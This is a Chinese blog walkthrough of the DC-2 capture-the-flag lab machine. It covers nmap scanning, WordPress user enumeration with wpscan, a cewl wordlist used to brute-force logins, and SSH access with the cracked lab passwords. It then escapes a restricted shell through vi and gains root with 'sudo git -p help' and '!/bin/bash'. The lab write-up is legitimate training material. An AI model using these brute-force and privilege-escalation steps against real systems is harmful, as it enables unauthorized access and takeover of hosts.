DC-2靶场机渗透测试总结与全流程思路

于 2023-11-21 19:29:32 发布
阅读量139 收藏
点赞数 1
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_74220316/article/details/134539137
版权

DC-2靶场机渗透测试总结与全流程思路

实验环境

┌──(root㉿kali)-[~]
└─# uname -a       
Linux kali 6.3.0-kali1-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.3.7-1kali1 (2023-06-29) x86_64 GNU/Linux

靶机下载地址:http://www.five86.com/downloads/DC-2.zip

信息打点

  • 主机探测
┌──(root㉿kali)-[~]
└─# nmap -sn 10.0.2.0/24   
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-20 10:21 EST
Nmap scan report for 10.0.2.1
Host is up (0.00031s latency).
MAC Address: 52:54:00:12:35:00 (QEMU virtual NIC)
Nmap scan report for 10.0.2.2
Host is up (0.00018s latency).
MAC Address: 52:54:00:12:35:00 (QEMU virtual NIC)
Nmap scan report for 10.0.2.3
Host is up (0.00018s latency).
MAC Address: 08:00:27:4F:33:99 (Oracle VirtualBox virtual NIC)
Nmap scan report for 10.0.2.5
Host is up (0.00065s latency).
MAC Address: 08:00:27:18:56:06 (Oracle VirtualBox virtual NIC)
Nmap scan report for 10.0.2.4
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.20 seconds
  • 主机主页(访问失败记得修改一下hosts文件,linux在/etc/hosts

在这里插入图片描述

  • 主机端口与服务信息
┌──(root㉿kali)-[~]
└─# nmap -p- -sV 10.0.2.5  
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-20 10:28 EST
Nmap scan report for 10.0.2.5
Host is up (0.00048s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
7744/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
MAC Address: 08:00:27:18:56:06 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.08 seconds
  • 公网信息搜集

Apache的2.4.10存在文件解析漏洞,但是不存在上传点, 此外无可用exp,msfdb中未发现可用信息

wordpress的4.7.10存在WordPress REST API 内容注入漏洞,但是没有exp,

  • 使用wpscan进行漏扫
wpscan --update # 更新漏洞库

进行信息扫描:

┌──(root㉿kali)-[~]
└─# wpscan --url http://dc-2/   
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://dc-2/ [10.0.2.5]
[+] Started: Mon Nov 20 11:24:54 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.10 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://dc-2/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://dc-2/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://dc-2/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).
 | Found By: Rss Generator (Passive Detection)
 |  - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
 |  - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://dc-2/wp-content/themes/twentyseventeen/
 | Last Updated: 2023-11-07T00:00:00.000Z
 | Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 3.4
 | Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.2 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <==============================================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Mon Nov 20 11:24:59 2023
[+] Requests Done: 171
[+] Cached Requests: 5
[+] Data Sent: 39.584 KB
[+] Data Received: 356.633 KB
[+] Memory used: 260.359 MB
[+] Elapsed time: 00:00:04

从报告来看挺干净的,等下实在没办法考虑获取token进行再一次漏扫

进行测试

flag1

在首页检查页面,直接发现flag1:

在这里插入图片描述

flag2

根据flag1的提示,我们可知,下一个flag与用户有关,大概率要进入网站后台管理页面,而且提示了cewl,我们直接枚举用户名试试:

wpscan --url http://dc-2/ -e u

得到以下结果:

[i] User(s) Identified:

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] jerry
 | Found By: Wp Json Api (Aggressive Detection)
 |  - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] tom
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

Cewl(Custom Word List Generator)是一个用于生成自定义单词列表的工具。它通常用于渗透测试和信息收集,以创建可能用于破解密码或执行其他安全测试的字典。以下是关于Cewl的一些重要信息:

  1. 用途

    • 渗透测试:Cewl可用于在渗透测试期间生成可能的用户名和密码列表,以进行密码破解尝试。
    • 信息收集:它可用于从特定网站或文本中提取关键词,以创建自定义字典,有助于更好地了解目标。

  2. 工作原理

    • Cewl通过访问特定网站或分析文本文件,提取其中的单词和短语。它会忽略一些常见的单词,如连接词和停用词,从而生成更有用的单词列表。
    • 用户可以通过参数配置Cewl,以便调整提取过程,例如指定最小单词长度、排除特定域名等。

  3. 命令行工具

    • Cewl通常是一个命令行工具,用户需要在终端或命令提示符中运行相应的命令来使用它。

  4. 示例

    • 下面是一个使用Cewl的简单示例命令:

      cewl http://example.com -w custom_wordlist.txt

      这将访问http://example.com,提取网页上的单词,并将结果保存到名为custom_wordlist.txt的文件中。

  5. 定制选项

    • 用户可以通过命令行选项自定义Cewl的行为,例如排除特定域名、指定深度级别、设置用户代理等。

我们直接提取关键词产生字典:

┌──(root㉿kali)-[~]
└─# cewl http://dc-2/index.php/flag/ -w ~/Desktop/dc-2.txt
CeWL 6.1 (Max Length) Robin Wood (robin@digi.ninja) (https://digi.ninja/)

然后手搓一个用户名字典导入BurpSuite,然后抓取该版本wordpress的登录页面数据包:

在这里插入图片描述

选中参数,导入对应参数位的字典,开始爆破,结束后得到两密码,且admin爆破失败:

在这里插入图片描述

当然也可以使用wpscan

wpscan --url http://dc-2 -U ~/Desktop/Code/usr.txt -P ~/Desktop/dc-2.txt

在报告中得到以下结果:

[+] Performing password attack on Xmlrpc against 3 user/s
[SUCCESS] - jerry / adipiscing                                                                                               
[SUCCESS] - tom / parturient                                                                                                 
Trying admin / ridiculus Time: 00:00:48 <============================                    > (699 / 1175) 59.48%  ETA: ??:??:??

然后我们进入jerry的后台页面,会发现flag2

在这里插入图片描述

flag3

根据提示,猜测大概是需要进入admin账户或者说网站目录中存在一些东西,但是爆破的话,完全取决你的字典,那么唯一可能有效的方式应该是ssh登录了:

我们使用两个已知用户名进行ssh登录尝试,必要时我们再进行目录爆破或者登录爆破:

┌──(root㉿kali)-[~]
└─# ssh -p 7744 tom@10.0.2.5
tom@10.0.2.5's password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
tom@DC-2:~$

发现tom账户可以成功登录,并且发现此时的shell为受限shell,我们进行常见指令尝试,最后用less得到flag3的内容:

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
tom@DC-2:~$ sudo -l
-rbash: sudo: command not found
tom@DC-2:~$ cat /etc/passwd
-rbash: cat: command not found
tom@DC-2:~$ ll
-rbash: ll: command not found
tom@DC-2:~$ ls
flag3.txt  usr
tom@DC-2:~$ ls -a
.  ..  .bash_history  .bash_login  .bash_logout  .bash_profile  .bashrc  flag3.txt  .profile  usr
tom@DC-2:~$ less flag3.txt

在这里插入图片描述

flag4

根据flag3的提示知道,接下来的操作应该是提权,然后在jerry用户上寻找线索,我们进行常见的指令操作,发现vi命令竟然没有被禁用,那我们就利用它进行提权:

在这里插入图片描述

我们用vi打开一个任意的文件,然后按esc进入命令模式,使用set shell=/bin/sh建立一个变量,然后回车,运行结束后,我们再次进入命令模式,输入建立的变量名shell即可进入sh命令行,也可以使用bash,我这里两种都尝试了,都可以:

在这里插入图片描述

进入bash后我们尝试修改环境变量,突破限制:

在这里插入图片描述

我们接着切换用户,然后查看用户的home目录,得到flag4

在这里插入图片描述

flag5

根据flag4,真的没有提示了吗?不,注意最后一句git,这绝对是来捣乱的(bushi

返回shell,试一试:

在这里插入图片描述

那我们尝试git提权,我们在终端输入 sudo git -p help

在这里插入图片描述

在左下角会有一个shell输入区,我们键入!/bin/bash,将会直接进入rootshell

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值